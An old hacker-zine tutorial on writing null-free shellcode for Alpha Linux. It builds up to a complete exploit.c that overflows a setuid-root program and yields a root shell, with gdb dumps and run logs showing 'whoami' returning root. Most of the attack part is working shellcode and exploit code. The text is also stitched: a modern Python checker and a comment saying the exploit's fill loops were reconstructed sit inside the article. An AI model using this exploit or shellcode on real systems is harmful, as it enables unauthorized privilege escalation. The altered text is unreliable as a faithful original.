+-----------------------------------------------------------------------------------------------------------------------------------------------[CP #2]----+
+--------------------[2x04 Buffer overflow exploit in the alpha linux (/home/cp2/hack/eXploit_alpha_linux)]-------------------+

       Buffer overflow exploit for alpha Linux.
        -=============================================-
          Author: Taeho Oh \\ [email protected]
1. Introduction
There are various buffer overflow exploits. As a rule, they all work only on intel x86 linux. This article shows a method of writing an exploit for alpha linux.



2. What do you need to know before reading?
You should know assembly and C, as well as the Linux system. Of course, you must have some knowledge of buffer overflows. You can get it from Phrack 49-14 ("Smashing The Stack For Fun And Profit" by Aleph1). It is an excellent article on buffer overflows and I strongly recommend reading it before going further.



3. Registers in alpha linux
You need to know the alpha registers before writing shellcode. =) All registers are 64-bit.
alpha registers
----------------------------------------------------------------------------
$0  v0
$1  t0
$2  t1
$3  t2
$4  t3
$5  t4
$6  t5
$7  t6
$8  t7
$9  s0
$10 s1
$11 s2
$12 s3
$13 s4
$14 s5
$15 fp
$16 a0
$17 a1
$18 a2
$19 a3
$20 a4
$21 a5
$22 t8
$23 t9
$24 t10
$25 t11
$26 ra
$27 t12
$28 at
$29 gp
$30 sp
$31 zero
$32 pc
$33 vfp
----------------------------------------------------------------------------


4. Let's write a sample shellcode
Now let's write a sample shellcode. You can ignore the '\0' character for now, because you can remove it later.
shellcodeasm.c
----------------------------------------------------------------------------
#include <unistd.h>

int main(void)
{
  char *name[2];
  name[0]="/bin/sh";
  name[1]=NULL;
  execve(name[0],name,NULL);
}
----------------------------------------------------------------------------

compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o shellcodeasm -static shellcodeasm.c
[ ohhara@ohhara ~ ] {2} $ gdb shellcodeasm
GNU gdb 4.17.0.4 with Linux/x86 hardware watchpoint and FPU support
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "alpha-redhat-linux"...
(gdb) disassemble main
Dump of assembler code for function main:
0x1200001e8 <main>:    ldah gp,18(t12)
0x1200001ec <main+4>:  lda gp,30704(gp)
0x1200001f0 <main+8>:  lda sp,-32(sp)
0x1200001f4 <main+12>: stq ra,0(sp)
0x1200001f8 <main+16>: stq fp,8(sp)
0x1200001fc <main+20>: mov sp,fp
0x120000200 <main+24>: ldq t0,-30952(gp)
0x120000204 <main+28>: stq t0,16(fp)
0x120000208 <main+32>: stq zero,24(fp)
0x12000020c <main+36>: ldq a0,16(fp)
0x120000210 <main+40>: addq fp,0x10,a1
0x120000214 <main+44>: clr a2
0x120000218 <main+48>: ldq t12,-32456(gp)
0x12000021c <main+52>: jsr ra,(t12),0x120007180 <__execve>
0x120000220 <main+56>: ldah gp,18(ra)
0x120000224 <main+60>: lda gp,30648(gp)
0x120000228 <main+64>: mov fp,sp
0x12000022c <main+68>: ldq ra,0(sp)
0x120000230 <main+72>: ldq fp,8(sp)
0x120000234 <main+76>: addq sp,0x20,sp
0x120000238 <main+80>: ret zero,(ra),0x1
End of assembler dump.
(gdb) disassemble execve
Dump of assembler code for function __execve:
0x120007180 <__execve>:    lda v0,59(zero)
0x120007184 <__execve+4>:  callsys
0x120007188 <__execve+8>:  bne a3,0x120007190 <__execve+16>
0x12000718c <__execve+12>: ret zero,(ra),0x1
0x120007190 <__execve+16>: br gp,0x120007194 <__execve+20>
0x120007194 <__execve+20>: ldah gp,18(gp)
0x120007198 <__execve+24>: lda gp,2116(gp)
0x12000719c <__execve+28>: ldq t12,-31592(gp)
0x1200071a0 <__execve+32>: jmp zero,(t12),0x120007738 <__syscall_error>
End of assembler dump.
(gdb)
----------------------------------------------------------------------------
Now you can see what is needed to run "/bin/sh".
To execute "/bin/sh"
----------------------------------------------------------------------------
a0($16) = address of "/bin/sh\0"
a1($17) = address of the address of "/bin/sh\0"
a2($18) = 0
v0($0) = 59
callsys
----------------------------------------------------------------------------
Knowing this, you can write the shellcode without much trouble.
testsc1.c
----------------------------------------------------------------------------
char shellcode[]=
  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
  "\x12\x04\xff\x47"      /* clr $18                      */
  "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
  "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
  "\x68\x00\x7f\x26"      /* ldah $19,0x0068($31)         */
  "\x2f\x73\x73\x22"      /* lda $19,0x732f($19)          */
  "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
  "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
  "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
  "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
  "\x3b\x00\x1f\x20"      /* lda $0,59($31)               */
  "\x83\x00\x00\x00";     /* callsys                      */

typedef void (*F)();

main()
{
  F fp;
  fp=(F)(&shellcode);
  fp();
}
----------------------------------------------------------------------------
The code above may look frightening. Don't worry, every line has an explanation =)
testsc1.c shellcode line by line explanation
----------------------------------------------------------------------------
char shellcode[]=

  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  /* $16 = $30 - 200                                      */
  /* $30 is stack pointer. To point "/bin/sh\0",          */
  /* shellcode needs free memory space. $30 - 200 may be  */
  /* free. :) "/bin/sh\0" character string will be stored */
  /* in the $30 - 200 address. To execute "/bin/sh", $16  */
  /* have to point to "/bin/sh\0"                         */
  /* The 'q' of the 'subq' means 64 bit.                  */

  "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
  /* $17 = $30 - 192                                      */
  /* To execute "/bin/sh", $17 have to point to the       */
  /* address of "/bin/sh\0". The address of "/bin/sh\0"   */
  /* will be stored in the $30 - 192 address.             */

  "\x12\x04\xff\x47"      /* clr $18                      */
  /* Clear $18 register. To execute "/bin/sh" $18         */
  /* register must be 0.                                  */

  "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
  /* Store the address of "/bin/sh\0" in the $30 - 192    */
  /* address.                                             */

  "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
  /* Make 0 in the address of $30 - 184.                  */

  "\x68\x00\x7f\x26"      /* ldah $19,0x0068($31)         */
  /* $19 = 0x00680000                                     */
  /* $31 is always 0                                      */

  "\x2f\x73\x73\x22"      /* lda $19,0x732f($19)          */
  /* $19 = 0x0068732f                                     */
  /* $19 = "/sh\0"                                        */
  /* Because alpha is little endian.                      */

  "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
  /* Store $19 in $30 - 196 address.                      */
  /* $30 - 196 = "/sh\0"                                  */
  /* The 'l' of the 'stl' means 32 bit                    */

  "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
  /* $19 = 0x6e690000                                     */

  "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
  /* $19 = 0x6e69622f                                     */
  /* $19 = "/bin"                                         */

  "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
  /* Store $19 in $30 - 200 address.                      */
  /* $30 - 200 = "/bin"                                   */

  "\x3b\x00\x1f\x20"      /* lda $0,59($31)               */
  /* $0 = 59                                              */
  /* To execute "/bin/sh" $0 must be 59                   */

  "\x83\x00\x00\x00";     /* callsys                      */
  /* System call                                          */
  /* Execute "/bin/sh"                                    */
----------------------------------------------------------------------------
Compile and run testsc1.c
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc testsc1.c -o testsc1
[ ohhara@ohhara ~ ] {2} $ ./testsc1
bash$
----------------------------------------------------------------------------
So we have shellcode for alpha linux. Of course, we cannot use it in an exploit yet, because the shellcode contains many '\0' characters. You must remove every '\0' character for the buffer overflow, since the string copy stops at the first one.



5. Trying to remove '\0' from the shellcode

You can remove '\0' characters by changing the instructions.
remove '\0' character
----------------------------------------------------------------------------
from

"\x68\x00\x7f\x26"      /* ldah $19,0x0068($31)         */
"\x2f\x73\x73\x22"      /* lda $19,0x732f($19)          */

to

"\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
"\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
"\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
----------------------------------------------------------------------------
One '\0' character removed.
----------------------------------------------------------------------------
from

"\x3b\x00\x1f\x20"      /* lda $0,59($31)               */

to

"\x13\x94\xe7\x43"      /* addq $31,60,$19              */
"\x20\x35\x60\x42"      /* subq $19,1,$0                */
----------------------------------------------------------------------------
Two removed.
The resulting shellcode
----------------------------------------------------------------------------
char shellcode[]=
  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
  "\x12\x04\xff\x47"      /* clr $18                      */
  "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
  "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
  "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
  "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
  "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
  "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
  "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
  "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
  "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
  "\x13\x94\xe7\x43"      /* addq $31,60,$19              */
  "\x20\x35\x60\x42"      /* subq $19,1,$0                */
  "\x83\x00\x00\x00";     /* callsys                      */
----------------------------------------------------------------------------
compile and run testsc2.c
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc testsc2.c -o testsc2
[ ohhara@ohhara ~ ] {2} $ ./testsc2
bash$
----------------------------------------------------------------------------
This is still not enough for the shellcode, because the callsys instruction must be used to run "/bin/sh", and callsys contains 3 '\0' characters. You must modify the shellcode.



6. Trying to remove ALL '\0' characters from the shellcode
final shellcode
----------------------------------------------------------------------------
char shellcode[]=
  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  /* $16 = $30 - 200                                      */
  /* $16 must hold the shellcode address. However, before */
  /* the bsr instruction, $16 can't have the address.     */
  /* This instruction just stores a meaningless address.  */
  /* All the instructions before the bsr are meaningless. */

  "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
  /* $17 = 0 or 0x83                                      */
  /* $17 = 0x83                                           */

  "\x12\x94\x07\x42"      /* addq $16,60,$18              */
  "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
  /* $17("\x83\x00\x00\x00") is stored in $16 + 60 - 4    */
  /* address.                                             */
  /* ( "\xff\xff\xff\xff" -> "\x83\x00\x00\x00" )         */

  "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
  "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
  /* $17 = "\x1f\x04\xff\x47"                             */
  /* "\x1f\x04\xff\x47" is nop instruction.               */

  "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
  /* change the "bsr $16,-28" instruction into a nop      */
  /* instruction to pass through the bsr instruction.     */
  /* ( "\xf9\xff\x1f\xd2" -> "\x1f\x04\xff\x47" )         */

  "\xf9\xff\x1f\xd2"      /* bsr $16,-28                  */
  /* Jump to "bis $31,0x83,$17" and store the current     */
  /* address in $16.                                      */
  /* After the jump, this instruction will be changed     */
  /* into a nop instruction.                              */

  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
  "\x12\x04\xff\x47"      /* clr $18                      */
  "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
  "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
  "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
  "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
  "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
  "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
  "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
  "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
  "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
  "\x13\x94\xe7\x43"      /* addq $31,60,$19              */
  "\x20\x35\x60\x42"      /* subq $19,1,$0                */

  "\xff\xff\xff\xff";     /* callsys ( disguised )        */
  /* This will be changed to "\x83\x00\x00\x00"           */
----------------------------------------------------------------------------
compile and run testsc3.c
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc testsc3.c -o testsc3
[ ohhara@ohhara ~ ] {2} $ ./testsc3
bash$
----------------------------------------------------------------------------
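As an added check (not the article's code), the Python below decodes the shellcode bytes of testsc1.c and testsc3.c with a small Alpha instruction decoder, lists the '\0' bytes that section 5 sets out to remove, and replays the bsr/stl self-patching of section 6 to confirm where the disguised callsys and the nop'd bsr end up. Opcode and function values are taken from the Alpha Architecture Handbook; the decoder covers only the instruction forms these shellcodes use.

```python
"""Static checker for the article's Alpha shellcode (added example, not the
article's code): decodes each instruction word, lists the '\0' bytes a strcpy
copy stops at (section 5), and replays the bsr/stl self-patching of section 6
to confirm where the disguised callsys and the nop'd bsr end up."""
import struct

# Encodings (opcode, function) from the Alpha Architecture Handbook.
OPERATE = {(0x10, 0x20): "addq", (0x10, 0x29): "subq",
           (0x11, 0x20): "bis", (0x11, 0x28): "ornot"}
MEMORY = {0x08: "lda", 0x09: "ldah", 0x2c: "stl", 0x2d: "stq"}
MASK64 = (1 << 64) - 1

# Instruction bytes copied from the page: testsc1.c (section 4), testsc3.c (section 6).
TESTSC1 = bytes.fromhex(
    "3015d943 3115d843 1204ff47 40ff1eb6 48fffeb7 68007f26 2f737322"
    " 3cff7eb2 696e7f26 2f627322 38ff7eb2 3b001f20 83000000")
TESTSC3 = bytes.fromhex(
    "3015d943 1174f047 12940742 fcff32b2 ff473f26 1f043122 fcff30b2"
    " f9ff1fd2 3015d943 3115d843 1204ff47 40ff1eb6 48fffeb7 98ff7f26"
    " d08c7322 1305f347 3cff7eb2 696e7f26 2f627322 38ff7eb2 1394e743"
    " 20356042 ffffffff")


def signed(v, bits):
    return v - (1 << bits) if v & (1 << (bits - 1)) else v


def decode(word):
    """Decode one 32-bit instruction word into its fields plus a gdb-like 'text'."""
    op, ra = word >> 26, (word >> 21) & 0x1f
    if op == 0 and (word & 0x3ffffff) == 0x83:            # CALL_PAL 0x83 = callsys
        return {"mn": "callsys", "text": "callsys"}
    if op in MEMORY:                                      # memory format: ra, disp(rb)
        rb, disp = (word >> 16) & 0x1f, signed(word & 0xffff, 16)
        return {"mn": MEMORY[op], "ra": ra, "rb": rb, "disp": disp,
                "text": f"{MEMORY[op]} ${ra},{disp}(${rb})"}
    if op == 0x34:                                        # bsr: 21-bit displacement in words
        disp = signed(word & 0x1fffff, 21)
        return {"mn": "bsr", "ra": ra, "disp": disp, "text": f"bsr ${ra},{disp * 4}"}
    func, rc, lit = (word >> 5) & 0x7f, word & 0x1f, bool(word & 0x1000)
    if (op, func) in OPERATE:                             # operate format: literal or register rb
        src = (word >> 13) & 0xff if lit else (word >> 16) & 0x1f
        mn = OPERATE[(op, func)]
        text = f"{mn} ${ra},{src if lit else '$%d' % src},${rc}"
        if mn == "bis" and ra == 31 and not lit and src == 31:    # gdb's pseudo-ops
            text = "nop" if rc == 31 else f"clr ${rc}"
        return {"mn": mn, "ra": ra, "rc": rc, "lit": lit, "src": src, "text": text}
    return {"mn": "?", "text": f".long {word:#010x}"}     # e.g. the disguised ffffffff


def disassemble(code):
    """[(byte offset, text)] for every word, offsets relative to the shellcode start."""
    return [(off, decode(struct.unpack_from("<I", code, off)[0])["text"])
            for off in range(0, len(code), 4)]


def nul_offsets(code):
    """Byte offsets of '\0': a strcpy()-based overflow copies nothing past the first one."""
    return [i for i, b in enumerate(code) if b == 0]


def replay_patches(code, max_steps=64):
    """Emulate only what is statically known: $31 is 0 and bsr leaves the
    shellcode-relative address of the next instruction in its link register.
    stl through a known base patches the code copy; stores through unknown
    bases (the stack, $30) are skipped. Returns (patched code, [(offset, value)])."""
    code, regs, patches, pc = bytearray(code), {31: 0}, [], 0
    for _ in range(max_steps):
        if pc >= len(code):
            break
        ins = decode(struct.unpack_from("<I", code, pc)[0])
        mn = ins["mn"]
        if mn == "callsys":
            break
        if mn in OPERATE.values():
            a = regs.get(ins["ra"])
            b = ins["src"] if ins["lit"] else regs.get(ins["src"])
            val = None
            if a is not None and b is not None:
                val = {"addq": a + b, "subq": a - b, "bis": a | b,
                       "ornot": a | (~b & MASK64)}[mn] & MASK64
            if ins["rc"] != 31:                           # writes to $31 are discarded
                regs[ins["rc"]] = val
        elif mn in ("lda", "ldah"):
            b = regs.get(ins["rb"])
            shift = 16 if mn == "ldah" else 0
            regs[ins["ra"]] = None if b is None else (b + (ins["disp"] << shift)) & MASK64
        elif mn == "stl":
            base, val = regs.get(ins["rb"]), regs.get(ins["ra"])
            if base is not None and val is not None and 0 <= base + ins["disp"] <= len(code) - 4:
                struct.pack_into("<I", code, base + ins["disp"], val & 0xffffffff)
                patches.append((base + ins["disp"], val & 0xffffffff))
        elif mn == "bsr":
            regs[ins["ra"]] = pc + 4                      # link register = next instruction
            pc = pc + 4 + ins["disp"] * 4
            continue
        pc += 4
    return bytes(code), patches
```

Running replay_patches on TESTSC3 reports the two stores at offsets 88 (the callsys word) and 28 (the bsr, now a nop), exactly the offsets the comments in the final shellcode describe.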



7. Inserting setuid(0) code into the shellcode

You will not get a root shell with the shellcode above. You must insert setuid(0) code into the shellcode.
setuidasm.c
----------------------------------------------------------------------------
#include <unistd.h>

int main(void)
{
  setuid(0);
}
----------------------------------------------------------------------------
compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o setuidasm -static setuidasm.c
[ ohhara@ohhara ~ ] {2} $ gdb setuidasm
GNU gdb 4.17.0.4 with Linux/x86 hardware watchpoint and FPU support
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "alpha-redhat-linux"...
(gdb) disassemble main
Dump of assembler code for function main:
0x1200001e8 <main>:    ldah gp,18(t12)
0x1200001ec <main+4>:  lda gp,30696(gp)
0x1200001f0 <main+8>:  lda sp,-16(sp)
0x1200001f4 <main+12>: stq ra,0(sp)
0x1200001f8 <main+16>: stq fp,8(sp)
0x1200001fc <main+20>: mov sp,fp
0x120000200 <main+24>: clr a0
0x120000204 <main+28>: ldq t12,-31056(gp)
0x120000208 <main+32>: jsr ra,(t12),0x120007180 <__setuid>
0x12000020c <main+36>: ldah gp,18(ra)
0x120000210 <main+40>: lda gp,30660(gp)
0x120000214 <main+44>: mov fp,sp
0x120000218 <main+48>: ldq ra,0(sp)
0x12000021c <main+52>: ldq fp,8(sp)
0x120000220 <main+56>: addq sp,0x10,sp
0x120000224 <main+60>: ret zero,(ra),0x1
End of assembler dump.
(gdb) disassemble setuid
Dump of assembler code for function __setuid:
0x120007180 <__setuid>:    lda v0,23(zero)
0x120007184 <__setuid+4>:  callsys
0x120007188 <__setuid+8>:  bne a3,0x120007190 <__setuid+16>
0x12000718c <__setuid+12>: ret zero,(ra),0x1
0x120007190 <__setuid+16>: br gp,0x120007194 <__setuid+20>
0x120007194 <__setuid+20>: ldah gp,18(gp)
0x120007198 <__setuid+24>: lda gp,2108(gp)
0x12000719c <__setuid+28>: ldq t12,-31600(gp)
0x1200071a0 <__setuid+32>: jmp zero,(t12),0x120007738 <__syscall_error>
End of assembler dump.
(gdb)
----------------------------------------------------------------------------
For setuid(0)
----------------------------------------------------------------------------
a0($16) = 0
v0($0) = 23
callsys
----------------------------------------------------------------------------
This also contains a system call. You must remove the '\0' characters in the setuid(0) code as well.
testsc4.c
----------------------------------------------------------------------------
char shellcode[]=
  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
  "\x12\x14\x02\x42"      /* addq $16,16,$18              */
  "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
  "\x12\x94\x09\x42"      /* addq $16,76,$18              */
  "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
  "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
  "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
  "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
  "\xf7\xff\x1f\xd2"      /* bsr $16,-32                  */
  "\x10\x04\xff\x47"      /* clr $16                      */
  "\x11\x14\xe3\x43"      /* addq $31,24,$17              */
  "\x20\x35\x20\x42"      /* subq $17,1,$0                */
  "\xff\xff\xff\xff"      /* callsys ( disguised )        */
  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
  "\x12\x04\xff\x47"      /* clr $18                      */
  "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
  "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
  "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
  "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
  "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
  "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
  "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
  "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
  "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
  "\x13\x94\xe7\x43"      /* addq $31,60,$19              */
  "\x20\x35\x60\x42"      /* subq $19,1,$0                */
  "\xff\xff\xff\xff";     /* callsys ( disguised )        */

typedef void (*F)();

main()
{
  F fp;
  fp=(F)(&shellcode);
  fp();
}
----------------------------------------------------------------------------
If you have read the article all the way through, you can guess what testsc4.c does :)
compile and run testsc4.c
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc testsc4.c -o testsc4
[ ohhara@ohhara ~ ] {2} $ ./testsc4
bash$
----------------------------------------------------------------------------



8. Exploit for a vulnerable setuid root program

You can examine a classic vulnerable program on alpha linux. Here is an example:
vulnerable.c
----------------------------------------------------------------------------
#include <stdio.h>
#include <string.h>

void vulfunc(char *buf)
{
  char localbuf[1024];
  strcpy(localbuf+1,buf);       /* unbounded copy: the bug under study */
}

int main(int argc,char **argv)
{
  if(argc>1)
    vulfunc(argv[1]);
  return 0;
}
----------------------------------------------------------------------------
You cannot change the return address of vulfunc. When you overflow localbuf in vulfunc, you change the return address of main instead (much like the stack on sparc), because localbuf is located above the saved return address of vulfunc. On intel x86, localbuf lies below the return address of vulfunc, so on intel x86 an overflow of localbuf can change vulfunc's return address. On alpha, however, localbuf cannot reach vulfunc's return address, but it can reach main's.

The code must be correctly aligned to run. For example, an instruction can be placed at 0x120000000 and 0x120000004, but not at 0x120000001, 0x120000002 or 0x120000003.

Addresses on alpha are 64 bits. An address contains many '\0' characters, so you cannot put several copies of the return address in the buffer; you have to put it exactly once. That means you must know the position of the return address exactly. It is not hard to find, because it is decided at compile time.
exploit.c
----------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define OFFSET                            0
#define ALIGN                             3     /* 0, 1, 2, 3           */
#define RET_POSITION                   1028     /* 0, 4, 8, 12, . . .   */
#define NOP              "\x1f\x04\xff\x47"     /* bis $31,$31,$31      */

char shellcode[]=
  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  "\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
  "\x12\x14\x02\x42"      /* addq $16,16,$18              */
  "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
  "\x12\x94\x09\x42"      /* addq $16,76,$18              */
  "\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
  "\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
  "\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
  "\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
  "\xf7\xff\x1f\xd2"      /* bsr $16,-32                  */
  "\x10\x04\xff\x47"      /* clr $16                      */
  "\x11\x14\xe3\x43"      /* addq $31,24,$17              */
  "\x20\x35\x20\x42"      /* subq $17,1,$0                */
  "\xff\xff\xff\xff"      /* callsys ( disguised )        */
  "\x30\x15\xd9\x43"      /* subq $30,200,$16             */
  "\x31\x15\xd8\x43"      /* subq $30,192,$17             */
  "\x12\x04\xff\x47"      /* clr $18                      */
  "\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
  "\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
  "\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
  "\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
  "\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
  "\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
  "\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
  "\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
  "\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
  "\x13\x94\xe7\x43"      /* addq $31,60,$19              */
  "\x20\x35\x60\x42"      /* subq $19,1,$0                */
  "\xff\xff\xff\xff";     /* callsys ( disguised )        */

unsigned long get_sp(void)
{
  __asm__("bis $31,$30,$0");    /* copy sp ($30) into the return register $0 */
}

int main(int argc,char **argv)
{
  char buff[RET_POSITION+8+ALIGN+1],*ptr;
  char *nop;
  int offset=OFFSET,bsize=RET_POSITION+8+ALIGN+1;
  unsigned long sp,addr;
  int i;

  if(argc>1)
    offset=atoi(argv[1]);

  nop=NOP;

  /* Buffer layout (the fill loops were lost in extraction and are
     reconstructed here from the dump shown below): ALIGN filler bytes,
     then nop instructions, then the shellcode ending at RET_POSITION+ALIGN,
     then the 8-byte return address. */
  for(i=0;i<ALIGN;i++)
    buff[i]='a';
  for(i=ALIGN;i<RET_POSITION+ALIGN-(int)strlen(shellcode);i++)
    buff[i]=nop[(i-ALIGN)%4];
  ptr=buff+RET_POSITION+ALIGN-strlen(shellcode);
  for(i=0;i<(int)strlen(shellcode);i++)
    *(ptr++)=shellcode[i];

  sp=get_sp();
  addr=sp-offset;

  buff[RET_POSITION+ALIGN]=(addr&0x00000000000000ff);
  buff[RET_POSITION+ALIGN+1]=(addr&0x000000000000ff00)>>8;
  buff[RET_POSITION+ALIGN+2]=(addr&0x0000000000ff0000)>>16;
  buff[RET_POSITION+ALIGN+3]=(addr&0x00000000ff000000)>>24;
  buff[RET_POSITION+ALIGN+4]=(addr&0x000000ff00000000)>>32;
  buff[RET_POSITION+ALIGN+5]=(addr&0x0000ff0000000000)>>40;
  buff[RET_POSITION+ALIGN+6]=(addr&0x00ff000000000000)>>48;
  buff[RET_POSITION+ALIGN+7]=(addr&0xff00000000000000)>>56;

  buff[bsize-1]='\0';

  printf("Jump to 0x%016lx\n",addr);

  execl("./vulnerable","vulnerable",buff,NULL);
  return 0;
}
----------------------------------------------------------------------------


Exploiting the vulnerable program on alpha linux
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ uname -a
Linux ohhara.postech.ac.kr 2.0.35 #11 Mon Oct 19 22:58:15 EDT 1998 alpha unknown
[ ohhara@ohhara ~ ] {2} $ ls -l vulnerable
-rwsr-xr-x   1 root     root        13906 Nov 13 14:55 vulnerable*
[ ohhara@ohhara ~ ] {3} $ ls -l exploit
-rwxrwxr-x   1 ohhara   ohhara      15541 Nov 13 18:22 exploit*
[ ohhara@ohhara ~ ] {4} $ ./exploit
Jump to 0x000000001ffff6c8
Illegal instruction
[ ohhara@ohhara ~ ] {5} $ ./exploit 400
Jump to 0x000000001ffff530
bash# whoami
root
bash#
----------------------------------------------------------------------------


Exploiting the vulnerable program on digital unix
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ uname -a
OSF1 monsky.postech.ac.kr V4.0 464 alpha
[ ohhara@ohhara ~ ] {2} $ ls -l vulnerable
-rwsr-xr-x   1 root     system     24576 Nov 13 20:31 vulnerable*
[ ohhara@ohhara ~ ] {3} $ ls -l exploit
-rwxr-xr-x   1 ohhara   system     24576 Nov 13 20:31 exploit*
[ ohhara@ohhara ~ ] {4} $ ./exploit
Jump to 0x000000001ffff030
# whoami
root
#
----------------------------------------------------------------------------
the buffer overflow data
----------------------------------------------------------------------------
    0  61 61 61 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      aaa...G...G...G.
   16  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
   32  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
   48  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
   64  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
   80  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
   96  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  112  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  128  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  144  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  160  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
